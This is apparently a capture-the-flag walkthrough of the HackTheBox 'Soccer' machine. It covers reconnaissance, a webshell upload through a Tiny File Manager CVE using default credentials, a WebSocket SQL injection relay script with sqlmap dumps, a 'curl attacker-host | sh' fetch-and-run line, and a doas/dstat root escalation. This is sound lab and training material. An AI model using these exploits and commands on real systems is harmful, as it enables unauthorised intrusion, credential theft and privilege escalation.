Soccer

Recon

nmap_scan.log

Open 10.129.99.191:22
Open 10.129.99.191:80
Open 10.129.99.191:9091
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.99.191

PORT     STATE SERVICE         REASON  VERSION
22/tcp   open  ssh             syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
|   256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
|   256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
80/tcp   open  http            syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open  xmltec-xmlmail? syn-ack

HTTP (80)

Writeup.png

Find directories in the application

└─$ feroxbuster -u 'http://soccer.htb/' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
403      GET        7l       10w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      494l     1440w    96128c http://soccer.htb/ground3.jpg
200      GET     2232l     4070w   223875c http://soccer.htb/ground4.jpg
200      GET      711l     4253w   403502c http://soccer.htb/ground2.jpg
200      GET      809l     5093w   490253c http://soccer.htb/ground1.jpg
200      GET      147l      526w     6917c http://soccer.htb/
301      GET        7l       12w      178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301      GET        7l       12w      178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 2m     90021/90021   0s      found:7       errors:0
[####################] - 64s    30000/30000   466/s   http://soccer.htb/
[####################] - 76s    30000/30000   394/s   http://soccer.htb/tiny/
[####################] - 76s    30000/30000   393/s   http://soccer.htb/tiny/uploads/ 

Writeup-1.png

In the source we can see version

<a href="https://tinyfilemanager.github.io/" target="_blank" class="text-muted" data-version="2.4.3">CCP Programmers</a> &mdash;&mdash;

CVE-2021-45010

We are able to login with default credentials.

Creds: admin:admin@123

Web root is leaked from uploads section

Writeup-2.png

Upload was not successful on this directory, but from frontend. Request didn't even go to backend, so to avoid hassle we can use previous PoC script.

└─$ git clone https://github.com/BKreisel/CVE-2021-45010.git
└─$ py CVE-2021-45010/src/cve_2021_45010/main.py  -u 'http://soccer.htb/tiny/tinyfilemanager.php' -l admin -p admin@123

PoC for CVE-2021-45010 - Tiny File Manager Version < 2.4.7
[*] Attempting Login:
        [*] URL      : http://soccer.htb/tiny/tinyfilemanager.php
        [*] Username : admin
        [*] Password : admin@123
[+] Session Cookie 🍪: u709u46lpj8ug017id2fju3357
[+] Login Success!
[+] Vulnerable version detected: 2.4.3
[*] Attempting to Leak Web Root...
        [+] Got Web Root: /var/www/html/tiny
[*] Attempting Webshell Upload:
[*] Filename : ccsamjtgjw.php
[*] GUI Path  : <ROOT>
[*] Filesystem Path  ../../../../../../../../../../../var/www/html/tiny//ccsamjtgjw.php
[-] Error: The specified folder for upload isn't writeable.

Hmm... same error.

Looks like we had to navigate to uploads directory and then do upload action, with this it's successful (from GUI too)

Writeup-3.png

Writeup-4.png

www-data@soccer:/etc/nginx/sites-enabled$ ls -alh
ls -alh
total 8.0K
drwxr-xr-x 2 root root 4.0K Dec  1  2022 .
drwxr-xr-x 8 root root 4.0K Nov 17  2022 ..
lrwxrwxrwx 1 root root   34 Nov 17  2022 default -> /etc/nginx/sites-available/default
lrwxrwxrwx 1 root root   41 Nov 17  2022 soc-player.htb -> /etc/nginx/sites-available/soc-player.htb

www-data@soccer:/etc/nginx/sites-enabled$ cat soc-player.htb
server {
        listen 80;
        listen [::]:80;
        server_name soc-player.soccer.htb;
        root /root/app/views;
        location / {
                proxy_pass http://localhost:3000;
                ...

Writeup-5.png

Application is running on port 3000, but it doesn't live in /var/www

If we signup and login we get ticket at the end, we are able to check ticket information if it exists. In burp we don't see traffic in HTTP, because application is using websockets. Testing for quick SQLi we get success message.

Writeup-6.png

Port 3306 indicates MySQL is running locally.

www-data@soccer:/etc/nginx/sites-enabled$ ss -utnlp4
Netid   State    Recv-Q   Send-Q     Local Address:Port      Peer Address:Port  Process
udp     UNCONN   0        0          127.0.0.53%lo:53             0.0.0.0:*
udp     UNCONN   0        0                0.0.0.0:68             0.0.0.0:*
tcp     LISTEN   0        511              0.0.0.0:80             0.0.0.0:*      users:(("nginx",pid=1044,fd=6),("nginx",pid=1039,fd=6))
tcp     LISTEN   0        4096       127.0.0.53%lo:53             0.0.0.0:*
tcp     LISTEN   0        128              0.0.0.0:22             0.0.0.0:*
tcp     LISTEN   0        511            127.0.0.1:3000           0.0.0.0:*
tcp     LISTEN   0        511              0.0.0.0:9091           0.0.0.0:*
tcp     LISTEN   0        70             127.0.0.1:33060          0.0.0.0:*
tcp     LISTEN   0        151            127.0.0.1:3306           0.0.0.0:*

Automating Blind SQL injection over WebSocket (SQLi over Websockets)

# Credits: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091/"

def send_ws(payload):
    ws = create_connection(ws_server)
    data = '{"id":"%s"}' % unquote(payload).replace('"','\'') 

    ws.send(data)
    resp = ws.recv()
    ws.close()

    return resp if resp else ''

def middleware_server(host_port,content_type="text/plain"):
    class CustomHandler(SimpleHTTPRequestHandler):
        def do_GET(self) -> None:
            self.send_response(200)
            try: payload = urlparse(self.path).query.split('=',1)[1]
            except IndexError: payload = False
                
            content = send_ws(payload) if payload else 'No parameters specified!'

            self.send_header("Content-type", content_type)
            self.end_headers()
            self.wfile.write(content.encode())
            return

    class _TCPServer(TCPServer):
        allow_reuse_address = True

    httpd = _TCPServer(host_port, CustomHandler)
    httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
    middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
    pass

└─$ sqlmap -u 'http://localhost:8081/?id=*' --dbms=MySQL --batch --level=5 --risk=3 --technique=B --tables --currentdb
└─$ sqlmap -u 'http://localhost:8081/?id=*' --dbms=MySQL --batch --level=5 --risk=3 --technique=B --current-db --threads 3
└─$ sqlmap -u 'http://localhost:8081/?id=*' --dbms=MySQL --batch --level=5 --risk=3 --technique=B --tables -D soccer_db --threads 3
└─$ sqlmap -u 'http://localhost:8081/?id=*' --dbms=MySQL --batch --level=5 --risk=3 --technique=B -D soccer_db -T accounts --dump --threads 3
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

SSH (22)

Creds: player:PlayerOftheMatch2022

└─$ ssh player@soccer.htb
player@soccer:~$ id
uid=1001(player) gid=1001(player) groups=1001(player)

User.txt

player@soccer:~$ cat user.txt
cf45f83f57bb94652f236c18db39415b

Privileges Escalation

player@soccer:~$ curl 10.10.14.99/lp.sh|sh|tee lp.log
...
                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 42K Nov 17  2022 /usr/local/bin/doas
...
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat

https://gtfobins.github.io/gtfobins/dstat/

player@soccer:~$ echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py
player@soccer:~$ doas -u root /usr/bin/dstat --xxx
# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

# cd /root
# cat root.txt
c315251feef276c10e33ed5bd5ed615c